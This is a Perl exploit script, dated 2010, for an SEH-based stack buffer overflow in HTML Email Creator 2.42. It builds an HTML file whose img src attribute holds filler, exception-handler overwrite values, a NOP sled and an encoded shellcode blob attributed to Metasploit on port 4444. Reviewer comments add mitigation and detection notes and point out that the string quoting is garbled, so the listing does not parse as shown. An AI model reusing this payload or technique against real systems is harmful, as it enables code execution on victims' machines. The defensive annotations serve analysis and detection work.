
# Title : HTML Email Creator 2.42 build 718 Buffer Overflow Exploit (SEH)
# Published : 2010-07-29
# Author : MadjiX


########################################################################################
#                                                           _                          #
#                           .-----.--.--.--.----.----.-.---| |                         #
#                           |  _  |  |  |  |     |  -__|  _  |                         #
#                           |   __|________|__|__|_____|_____|                         #
#                           |__|        By MadjiX                                      #
#                                      Sec4ever.com                                    #
########################################################################################
#Title : HTML Email Creator 2.42 build 718 - 0day buffer overflow exploit (SEH)        #
#author : MadjiX <Dz8[]Hotmail{}com>                                                   #
#Gr33tz : His0k4 , Bibi-info , volc4n0                                                 #
#version 2.3 : http://www.exploit-db.com/exploits/9446/ # by flo flow                  #
#version 2.1 : http://www.exploit-db.com/exploits/8401/ # by Dun                       #
########################################################################################
# Builds the pieces of an HTML document whose <img src="..."> attribute value
# is oversized. Per the header above, the target is HTML Email Creator 2.42
# build 718 and the bug class is a stack buffer overflow that reaches a
# structured-exception-handler (SEH) record.
#
# NOTE(review): the string literals on this page look altered by extraction
# (the quoting on the $hd2/$hd1 lines is unbalanced), so the listing does not
# parse as Perl as shown. Read it as a description of the file layout.
#
# Defender notes: overwriting an exception-handler record is the technique that
# SafeSEH and SEHOP are meant to stop, with DEP and ASLR as further layers.
# The handler value below is a single hard-coded address, so it presumably
# depends on one specific module build being loaded at a fixed base -- verify
# which module that is and whether it opts in to those mitigations.
#
# $file : declared but never read in the visible script; the output name used
#         later is the separate literal 'MadjiX.html' (different case).
# $hd2  : closing HTML markup written after the attribute data.
# $hd1  : opening HTML markup, ending inside the img src attribute.
my $file="madjix.html";
my $hd2 ="">n</BODY>n</HTML>n";
my $hd1 ="<HTML>n<HEAD></HEAD>n<BODY>n<img src="" ;
# Filler written first inside the attribute: the literal repeated 56 times.
my $buff= "x41" x 56 ;
# By its name, the "next handler" field of the exception record.
my $nseh="xebx11x90x90";
# By its name, the handler field: pack('V', ...) encodes the hard-coded value
# 0x753DE4BD as an unsigned 32-bit little-endian integer.
my $seh= pack('V',0x753DE4BD);
# Padding placed between the handler field and the payload (24 repetitions).
my $nops="x90" x 24;
# http://www.metasploit.com 4444
# Opaque payload blob, kept exactly as printed on the page; it has not been
# decoded or verified here. The original comment above attributes it to
# Metasploit and gives 4444 -- presumably a TCP port, confirm before relying
# on it. For triage, treat any HTML file carrying this blob as hostile and
# review network activity on the host that opened it.
my $shellcode =
"x56x54x58x36x33x30x56x58x48x34x39x48x48x48" .
"x50x68x59x41x41x51x68x5ax59x59x59x59x41x41" .
"x51x51x44x44x44x64x33x36x46x46x46x46x54x58" .
"x56x6ax30x50x50x54x55x50x50x61x33x30x31x30" .
"x38x39x49x49x49x49x49x49x49x49x49x49x49x49" .
"x49x49x49x49x49x37x51x5ax6ax41x58x50x30x41" .
"x30x41x6bx41x41x51x32x41x42x32x42x42x30x42" .
"x42x41x42x58x50x38x41x42x75x4ax49x49x6cx4a" .
"x48x4fx79x47x70x47x70x45x50x45x30x4ex69x48" .
"x65x50x31x4ax72x51x74x4cx4bx42x72x44x70x4e" .
"x6bx46x32x44x4cx4cx4bx51x42x45x44x4ex6bx51" .
"x62x47x58x44x4fx48x37x50x4ax46x46x50x31x49" .
"x6fx45x61x4bx70x4ex4cx45x6cx43x51x43x4cx45" .
"x52x46x4cx45x70x49x51x48x4fx44x4dx47x71x4f" .
"x37x48x62x48x70x46x32x42x77x4ex6bx42x72x46" .
"x70x4cx4bx51x52x45x6cx43x31x4ax70x4cx4bx47" .
"x30x50x78x4bx35x49x50x51x64x43x7ax46x61x4a" .
"x70x46x30x4cx4bx47x38x47x68x4ex6bx43x68x47" .
"x50x45x51x4ax73x4ax43x47x4cx51x59x4cx4bx50" .
"x34x4cx4bx47x71x48x56x44x71x49x6fx46x51x4f" .
"x30x4cx6cx49x51x48x4fx44x4dx46x61x4fx37x46" .
"x58x49x70x50x75x49x64x43x33x43x4dx49x68x45" .
"x6bx43x4dx51x34x50x75x4ax42x51x48x4ex6bx50" .
"x58x51x34x43x31x4ax73x43x56x4ex6bx44x4cx42" .
"x6bx4ex6bx51x48x45x4cx47x71x48x53x4ex6bx45" .
"x54x4ex6bx45x51x4ax70x4cx49x51x54x45x74x45" .
"x74x43x6bx51x4bx51x71x50x59x43x6ax46x31x49" .
"x6fx49x70x50x58x43x6fx42x7ax4ex6bx44x52x4a" .
"x4bx4fx76x51x4dx51x78x45x63x50x32x47x70x47" .
"x70x50x68x51x67x44x33x46x52x51x4fx50x54x50" .
"x68x42x6cx50x77x47x56x47x77x4bx4fx4ax75x4e" .
"x58x4ex70x46x61x45x50x47x70x46x49x4fx34x50" .
"x54x46x30x50x68x46x49x4dx50x50x6bx45x50x49" .
"x6fx4bx65x50x50x42x70x42x70x42x70x47x30x50" .
"x50x43x70x46x30x43x58x4ax4ax44x4fx49x4fx4b" .
"x50x4bx4fx48x55x4fx79x49x57x43x58x49x50x4d" .
"x78x47x71x47x71x43x58x46x62x43x30x42x31x51" .
"x4cx4cx49x4dx36x43x5ax46x70x42x76x42x77x45" .
"x38x4ax39x4dx75x44x34x51x71x4bx4fx4ex35x51" .
"x78x43x53x50x6dx45x34x43x30x4bx39x48x63x50" .
"x57x43x67x46x37x50x31x4bx46x51x7ax46x72x42" .
"x79x43x66x4dx32x49x6dx45x36x4fx37x50x44x46" .
"x44x47x4cx46x61x46x61x4cx4dx43x74x44x64x42" .
"x30x4ax66x47x70x51x54x51x44x42x70x46x36x42" .
"x76x51x46x43x76x46x36x50x4ex51x46x43x66x51" .
"x43x50x56x51x78x42x59x48x4cx45x6fx4bx36x49" .
"x6fx4ex35x4ex69x4bx50x50x4ex43x66x51x56x4b" .
"x4fx46x50x50x68x46x68x4ex67x47x6dx45x30x4b" .
"x4fx49x45x4fx4bx4ax50x4cx75x4dx72x43x66x43" .
"x58x4dx76x4ex75x4fx4dx4dx4dx4bx4fx4ax75x47" .
"x4cx43x36x43x4cx44x4ax4dx50x4bx4bx4dx30x43" .
"x45x47x75x4fx4bx50x47x46x73x44x32x50x6fx42" .
"x4ax47x70x46x33x49x6fx4ax75x41x41";
# Trailing filler appended after the payload: the literal repeated 500 times.
my $m2d="x42" x 500 ;
# Two-argument open on a bareword handle in append mode ('>>'), with no check
# of the result: a failed open goes unnoticed, and a rerun appends a second
# copy to an existing MadjiX.html instead of replacing it.
open(MYFILE,'>>MadjiX.html');
# Write order: opening markup, filler, the two exception-record fields,
# padding, payload, trailing filler, closing markup. Everything between the
# opening and closing markup lands in the img src attribute value.
# Detection idea: an img src value that runs far past any plausible URL length
# is anomalous; mail and web gateways can flag HTML attributes by length.
print MYFILE $hd1.$buff.$nseh.$seh.$nops.$shellcode.$m2d.$hd2;
close(MYFILE);